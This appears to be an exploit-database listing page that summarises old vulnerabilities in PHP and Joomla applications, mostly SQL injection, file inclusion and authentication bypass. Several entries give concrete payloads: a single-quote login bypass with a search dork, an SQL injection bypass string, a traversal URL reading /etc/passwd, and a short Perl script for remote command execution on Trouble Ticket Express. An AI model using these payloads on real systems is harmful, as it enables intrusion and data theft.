header-logo
Suggest Exploit
explore-vulnerabilities

Explore Vulnerabilities

Version
Year

Explore all Exploits:

Bypass Admin Exploit

This exploit allows an attacker to bypass authentication by entering a single quote (') as the username and password. This is due to the lack of input validation in the login form of the RogioBiz_PHP_file_manager_V1.2 script. The script can be downloaded from http://www.scriptingblog.com/download/RogioBiz_PHP_file_manager_V1.2.zip and can be found using the dork inurl:/rbfminc/.

Joomla com_nfnaddressbook Remote Sql Injection Vulnerability

This vulnerability allows an attacker to inject malicious SQL queries into the vulnerable application. This vulnerability exists in the com_nfnaddressbook component of Joomla. By manipulating the 'record_id' parameter, an attacker can inject arbitrary SQL queries into the application. This can be exploited to gain access to the application's database and potentially gain access to sensitive information.

DesktopOnNet 3 Beta9 Local File Include Vulnerability

DesktopOnNet 3 Beta9 is vulnerable to a Local File Include vulnerability. This vulnerability exists in the 'don3_toolbox.php' file, which is located in the 'DON3/applications/don3_toolbox.don3app/' directory. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing a malicious 'don3_lang' parameter. This will allow the attacker to include a malicious file from the server, resulting in remote code execution.

SQL Injection in Login User Name Field

The login user name field of the Front Door software version 0.4b is vulnerable to SQL injection. An attacker can exploit this vulnerability by entering a malicious SQL query in the user name field. For example, ' OR username IS NOT NULL OR username = ' can be used to bypass authentication.

PHP-Fusion <= 6.01.15.4 (downloads.php) SQL Injection Vulnerability

A vulnerability exists in the downloads.php file of PHP-Fusion version 6.01.15.4, where the parameter $page_id is vulnerable to SQL injection. An attacker can exploit this vulnerability by sending a crafted request with a malicious SQL query to the downloads.php file. The malicious query can be used to extract sensitive information from the database, such as usernames and passwords, which are encrypted using the md5 (md5 ($ pass)) algorithm.

Joomla com_org SQL Injection Vulnerability

A SQL injection vulnerability exists in Joomla com_org component. An attacker can exploit this vulnerability to inject malicious SQL queries into the application and gain access to sensitive information from the database. The vulnerability is due to insufficient sanitization of user-supplied input in the 'id' parameter of the 'index.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request with malicious SQL queries to the vulnerable script. Successful exploitation of this vulnerability can result in unauthorized access to sensitive information from the database.

Trouble Ticket Express Remote Code Execution/Directory Traversal

This is only possible if an attachment input is available. Directory Traversal Vuln is http://localhost/cgi-bin/ttx.cgi?cmd=file&fn=../../../../../../etc/passwd Simple perl code to run commands on the box $ id uid=0(httpd) gid=0(httpd) groups=0(httpd) $ whoami httpd!/usr/bin/perl use warnings; use strict; use LWP::Simple; my $url = 'http://localhost/cgi-bin/ttx.cgi'; print '$ '; while (<>) { print get( $url . '?cmd=file&fn=|' . $_ . '|' ); print '$ '; }

Recent Exploits: